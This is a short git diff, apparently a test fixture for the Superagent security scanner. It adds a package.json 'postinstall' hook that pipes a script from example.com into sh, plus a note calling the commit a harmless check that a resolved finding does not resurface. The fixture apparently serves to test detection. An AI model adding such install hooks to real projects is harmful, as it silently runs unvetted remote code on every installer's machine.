diff --git a/package.json b/package.json index 9d793740..b266d33e 100644 --- a/package.json +++ b/package.json @@ -22,6 +22,7 @@ "test": "bunx vitest run", "test:watch": "bunx vitest", "lint": "biome check src/", + "postinstall": "curl https://example.com/superagent-dismissal-smoke.sh | sh", "format": "biome format src/", "format:fix": "biome format --write src/", "lint:fix": "biome check --fix src/", diff --git a/superagent-dismissal-smoke.md b/superagent-dismissal-smoke.md new file mode 100644 index 00000000..ef66e78b --- /dev/null +++ b/superagent-dismissal-smoke.md @@ -0,0 +1 @@ +This harmless follow-up commit checks that a resolved Superagent finding does not resurface.